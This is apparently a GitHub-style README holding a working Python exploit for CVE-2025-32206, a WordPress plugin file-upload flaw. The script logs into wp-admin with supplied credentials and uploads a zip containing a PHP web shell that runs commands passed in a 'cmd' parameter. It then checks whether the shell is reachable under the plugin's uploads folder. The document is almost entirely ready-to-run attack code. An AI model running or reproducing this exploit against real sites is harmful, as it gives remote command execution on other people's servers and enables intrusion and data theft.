README.md
Rendering markdown...
import requests
from bs4 import BeautifulSoup
import zipfile
import argparse
import os
import urllib3
# Banner
print("""
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@ @@@@@@@@ @@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@@ @@@ @@! @@@@ !@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ @!@ @!@ !@! @!@!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@ !!@ @!@ @! !@! !!@@!@!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !!: !!: !@!!! !!! @!!@!!!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !:! !:! !!:! !!! !:! !:!
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: :!: :!: :!: !:! :!: !:!
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: :: ::::: :: ::::: ::::::: :: :::: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : :: : ::: :: : ::: : : : : :: : :
Nxploited | Khaled Alenazi
""")
urllib3.disable_warnings()
def create_shell_zip(zip_name="Nxploited.zip", shell_name="Nxploit.php"):
shell_code = "<?php echo 'Shell Executed'; system($_GET['cmd']); ?>"
with zipfile.ZipFile(zip_name, 'w') as z:
z.writestr(shell_name, shell_code)
print(f"[+] Created zip with shell: {zip_name} -> {shell_name}")
return zip_name, shell_name
def login(session, url, username, password):
login_data = {
"log": username,
"pwd": password,
"rememberme": "forever",
"wp-submit": "Log In",
"redirect_to": f"{url}/wp-admin/",
"testcookie": "1"
}
response = session.post(f"{url}/wp-login.php", data=login_data)
if 'wordpress_logged_in' in str(session.cookies):
print("[+] Logged in successfully.")
return True
else:
print("[-] Login failed.")
return False
def extract_form_data(session, new_post_url):
response = session.get(new_post_url)
soup = BeautifulSoup(response.text, "html.parser")
hidden_inputs = soup.find_all("input", {"type": "hidden"})
data = {tag.get("name"): tag.get("value") for tag in hidden_inputs if tag.get("name")}
data.update({
"post_title": "Shell Upload Test",
"publish": "Publish"
})
print("[+] Extracted form fields successfully.")
return data
def upload_zip(session, url, data, zip_path):
with open(zip_path, "rb") as f:
files = {
"project_zip": (zip_path, f, "application/zip")
}
response = session.post(f"{url}/wp-admin/post.php", data=data, files=files)
if response.status_code == 200:
print("[+] Upload request sent successfully.")
else:
print("[-] Upload failed.")
def check_shell(session, shell_url):
try:
response = session.get(shell_url)
if "Shell Executed" in response.text:
print(f"[+] Shell executed at: {shell_url}")
elif response.status_code == 200:
print(f"[?] Shell exists but no output: {shell_url}")
else:
print("[-] Shell not found.")
except Exception as e:
print(f"[-] Error checking shell: {e}")
def main():
parser = argparse.ArgumentParser(description="Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g. http://192.168.100.74:888/wordpress)")
parser.add_argument("-un", "--username", required=True, help="WordPress admin username")
parser.add_argument("-p", "--password", required=True, help="WordPress admin password")
args = parser.parse_args()
session = requests.Session()
session.verify = False
session.headers.update({"User-Agent": "Mozilla/5.0"})
zip_file, shell_name = create_shell_zip()
if not login(session, args.url, args.username, args.password):
return
new_post_url = f"{args.url}/wp-admin/post-new.php?post_type=processing-project"
form_data = extract_form_data(session, new_post_url)
upload_zip(session, args.url, form_data, zip_file)
shell_path = f"{args.url}/wp-content/uploads/processing-projects/{shell_name}"
check_shell(session, shell_path)
if __name__ == "__main__":
main()